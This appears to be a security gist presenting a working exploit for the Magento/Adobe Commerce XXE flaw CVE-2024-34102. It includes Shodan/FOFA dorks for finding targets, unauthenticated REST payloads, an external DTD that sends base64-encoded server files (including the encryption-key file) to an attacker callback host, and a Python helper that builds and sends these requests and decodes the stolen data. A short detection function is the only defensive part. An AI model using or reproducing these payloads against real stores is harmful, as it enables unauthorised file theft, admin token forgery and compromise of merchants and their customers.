Created June 28, 2024 17:36
Gist: wtf-yodhha/b4b12a09a4c2d3af0e04b74968daed5d
Unauthenticated Magento XXE CVE-2024-34102 to Privilege Escalation
🔥Magento XXE CVE-2024-34102: a newly discovered vulnerability dubbed "CosmicSting" puts a large number of online stores built on Adobe Commerce and Magento at risk. The REST API deserializes nested JSON into PHP objects, so an unauthenticated request can hand attacker-controlled constructor arguments (data, dataIsURL, options) to SimpleXMLElement and trigger XML external entity (XXE) processing.
⚠️CosmicSting lets attackers read sensitive files from the server, including those containing passwords and the store's encryption key in app/etc/env.php; with that key an attacker can forge admin API tokens, which is the privilege-escalation step.
When combined with a recent glibc bug (CVE-2024-2961, an out-of-bounds write in iconv() that is reachable through php://filter), the file read can be escalated to remote code execution.
📣Dorks:
Hunter: http://product.name="Adobe Magento"
FOFA: app="Adobe-Magento"
SHODAN: http.html:"magento-template"
🔴POC: https://github.com/th3gokul/CVE-2024-34102
⛔️Payload (blind check: a DNS/HTTP hit on your collaborator host for xxe.xml confirms the server fetched the external resource; replace *.oastify.com with your own host):
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Content-Type: application/json
Content-Length: 192 (recompute for the actual body after substituting your collaborator host)

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://*.oastify.com/xxe.xml","dataIsURL":true,"options":12345678}}}}}}

Note: "options" is passed straight to libxml2 as a bitmask. 12345678 has bits 2 (LIBXML_NOENT) and 4 (LIBXML_DTDLOAD) set, so entities are substituted and external DTDs are loaded.
⚠️Privilege Escalation (out-of-band file read; point it at app/etc/env.php to obtain the crypt key)

Request body (options 16 = LIBXML_DTDVALID, which forces the external DTD to be fetched and parsed):
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"https://raw.com/exploit2.dtd\"> %sp; %param1; ]> <r>&exfil;</r>","options":16}}}}}}

Contents of exploit2.dtd, hosted on the attacker server (https://raw.com is a placeholder). The file is read through php://filter with base64 encoding so newlines and slashes cannot break the SYSTEM URL; the encoded content arrives in the query string of the callback request:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://*.oastify.com/dtd.xml?%data;'>">
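The following Python helper is an added example and is not code from this gist or from the linked PoC repository. It builds the two request bodies shown above, generates the external DTD, decodes what comes back on the collaborator, and flags a request body that carries SimpleXMLElement constructor arguments, which is the check a WAF rule or log review would apply. The host names collab.example and target.example, the ENDPOINT constant and the sample bodies are constructed for illustration; the libxml2 flag values are the real xmlParserOption bits.

```python
import base64
import json
import urllib.error
import urllib.parse
import urllib.request

# Endpoint used in the gist; the guest cart id is arbitrary and needs no authentication.
ENDPOINT = "/rest/V1/guest-carts/1/estimate-shipping-methods"

# libxml2 xmlParserOption bits relevant to this bug.
LIBXML_NOENT = 1 << 1     # 2: substitute entities
LIBXML_DTDLOAD = 1 << 2   # 4: load the external DTD subset
LIBXML_DTDVALID = 1 << 4  # 16: validate, which also forces DTD loading
KNOWN_FLAGS = {LIBXML_NOENT: "LIBXML_NOENT", LIBXML_DTDLOAD: "LIBXML_DTDLOAD",
               LIBXML_DTDVALID: "LIBXML_DTDVALID"}


def dangerous_flags(options):
    """Names of the entity/DTD flags set in an 'options' value."""
    return [name for bit, name in KNOWN_FLAGS.items() if options & bit]


def build_payload(data, options, data_is_url=False):
    """Wrap SimpleXMLElement constructor arguments in the nested object chain the
    REST deserializer walks: address -> totalsCollector -> collectorList ->
    totalCollector -> sourceData."""
    inner = {"data": data, "options": options}
    if data_is_url:
        inner["dataIsURL"] = True
    body = {"address": {"totalsCollector": {"collectorList": {
        "totalCollector": {"sourceData": inner}}}}}
    return json.dumps(body, separators=(",", ":"))


def build_xxe_document(dtd_url):
    """Inline XML that loads the attacker DTD and expands the exfil entity."""
    return ('<?xml version="1.0" ?><!DOCTYPE r [ <!ELEMENT r ANY > '
            '<!ENTITY % sp SYSTEM "' + dtd_url + '"> %sp; %param1; ]><r>&exfil;</r>')


def build_oob_dtd(resource, callback):
    """External DTD: %data reads the file base64-encoded via php://filter, %param1
    declares the exfil entity whose SYSTEM URL carries that data to the callback."""
    return ('<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource='
            + resource + '">\n'
            '<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'' + callback + '?%data;\'>">\n')


def decode_exfil(callback_url):
    """Recover the file content from the query string of the callback request."""
    query = urllib.parse.urlsplit(callback_url).query
    return base64.b64decode(query).decode("utf-8", errors="replace")


def _walk(node, path=()):
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk(value, path + (key,))
    elif isinstance(node, list):
        for idx, value in enumerate(node):
            yield from _walk(value, path + (idx,))
    else:
        yield path, node


def is_cosmicsting_body(raw_body):
    """Detection: flag JSON whose 'sourceData' object smuggles dataIsURL/options,
    or whose 'data' is an XML document or a URL (legitimate address payloads
    never carry a sourceData object)."""
    try:
        doc = json.loads(raw_body)
    except ValueError:
        return False
    for path, value in _walk(doc):
        if len(path) >= 2 and path[-2] == "sourceData":
            key = path[-1]
            if key in ("dataIsURL", "options"):
                return True
            if key == "data" and isinstance(value, str):
                lowered = value.lstrip().lower()
                if lowered.startswith(("<?xml", "<!doctype", "http://", "https://",
                                       "ftp://", "php://", "file://")):
                    return True
    return False


def send_payload(base_url, body):
    """Deliver a body to a target you are authorised to test; returns the HTTP status."""
    req = urllib.request.Request(base_url.rstrip("/") + ENDPOINT, data=body.encode(),
                                 headers={"Content-Type": "application/json"}, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


# Constructed sample bodies: one ordinary shipping estimate, one CosmicSting probe.
BENIGN_BODY = json.dumps({"address": {"country_id": "US", "postcode": "90210"}})
PROBE_BODY = build_payload("http://collab.example/xxe.xml", 12345678, data_is_url=True)

if __name__ == "__main__":
    print(dangerous_flags(12345678), dangerous_flags(16))
    print(is_cosmicsting_body(BENIGN_BODY), is_cosmicsting_body(PROBE_BODY))
    print(build_oob_dtd("/etc/passwd", "http://collab.example/dtd.xml"))
```

The detector keys on the sourceData object rather than on the literal endpoint, because the same nested-argument deserialization is reachable from other REST routes; for the second stage, the callback host only needs to log request lines, since decode_exfil works on the URL it receives.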
Brut Security